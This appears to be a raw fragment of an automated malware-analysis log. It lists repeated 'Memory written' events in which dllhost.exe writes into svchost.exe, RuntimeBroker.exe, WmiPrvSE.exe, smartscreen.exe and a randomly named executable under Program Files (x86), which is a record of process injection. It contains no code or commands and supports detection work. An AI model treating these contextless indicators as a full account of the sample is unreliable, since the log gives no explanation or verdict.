Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26DD2000000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 13D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 257155B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 600000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dasHost.exe base: 16443E50000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: BB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2C8A6F80000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 920000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1E968250000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 970000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A9452E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1020000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 29227D20000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 590000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 283E5BE0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1200000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\smartscreen.exe base: 14BB07C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 13F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22C4F660000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: B20000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1DBAE500000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1300000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 27B1B9F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: DA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 27FF3CD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 760000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 281CF7C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 12E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 28843650000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: BD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 25F39DF0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1320000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 3CF0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1100000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1B409660000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 7D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1C5325C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 820000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 225DEC30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 15EC91C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1200000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 500000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: B20000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 730000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 5F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1440000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1230000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 410000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: A00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: BD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: C30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 7E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 470000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: BD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: D90000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 6C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1300000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 13D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1410000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 600000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 13C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: BB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 6C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 920000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: FA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 970000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: CC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1020000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: EE0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 590000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 11E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1200000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1200000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: B20000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 12D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1300000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 10E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: DA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 760000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 820000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 12E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1240000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: C30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1020000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1100000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 7D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1030000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 820000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 3A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1200000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1320000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: B20000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 5F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: F90000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: F80000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: A00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 820000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 7E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 880000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: BD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 6C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: DA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1300000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 8C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1410000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 7E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 13C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 6C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: FB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: FA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: A60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: CC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1130000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: EE0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 560000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 11E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1200000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 900000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 12D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1510000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: C40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 820000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1240000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: AD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: C30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 190000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1020000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: FB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1030000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 3A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 5D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1320000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: B00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: F90000
